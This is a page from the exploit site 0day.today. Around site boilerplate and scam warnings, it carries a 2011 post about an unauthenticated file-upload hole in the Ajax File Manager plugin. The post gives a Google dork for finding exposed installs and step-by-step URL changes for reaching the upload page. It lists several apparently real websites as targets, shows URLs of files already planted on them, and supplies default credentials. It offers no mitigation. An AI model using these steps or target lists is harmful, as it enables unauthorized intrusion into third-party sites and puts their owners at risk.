0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ajax File Manager File Upload Vulnerability
========================================================================= Ajax File Manager File Upload Vulnerability ========================================================================= :-------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Ajax File Manager File Upload Vulnerability : # Date : 06 November 2011 : # Author : X-Cisadane : # Software Link : http://www.phpletter.com : # Version : All : # Category : Web Applications : # Vulnerability : File Upload Vulnerability : # Tested On : Google Chrome 14.0.835 (Windows) : # Dorks : inurl:/plugins/ajaxfilemanager/ : # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, Winda Utari :-------------------------------------------------------------------------------------------------------------------------: DESCRIPTIONS : Ajax File Manager is a Plug-ins which you can add on FCKEditor/TinyMCE on the CMS as a File Management, for example : Uploading File (Text, Image, dll), Create A New Folder, Copy, Cut, Delete File or Directory. File that can be uploaded is depend on The Website Configuration. Some Ajax File Manager configured without an authentification (No Login Form), So we can view directories and files on Ajax File Manager or upload/delete/cut/copy/paste/create new folder. HOW TO? [1] Open Google Search Engine, Type the dork : inurl:/plugins/ajaxfilemanager/ [2] For Example you got : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/ Change the URL on your Browser into : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php OR http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/ Change the URL on your Browser into : http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php [3] If the Ajax File Manager don't have a Login Form, so we can head up into File Manager directly and uploading file or whatever you can do. Like this : http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php http://www.thebradshawscornershop.co.uk/scripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php http://202.137.23.162/brantas_portal/assets/tinymce/plugins/ajaxfilemanager/ajaxfilemanager.php http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php Results : http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/dwi/bekdort.txt http://www.thebradshawscornershop.co.uk/images/dwi/bekdort.txt http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/dwi/bekdort.txt http://202.137.23.162/brantas_portal/uploaded_docimage/dwi/bekdort.txt http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/dwi/bekdort.txt P.S : Default Password Ajax File Manager Username:ajax Password:123456 -= Regards =- Dwi a.k.a X-Cisadane # 0day.today [2024-11-15] #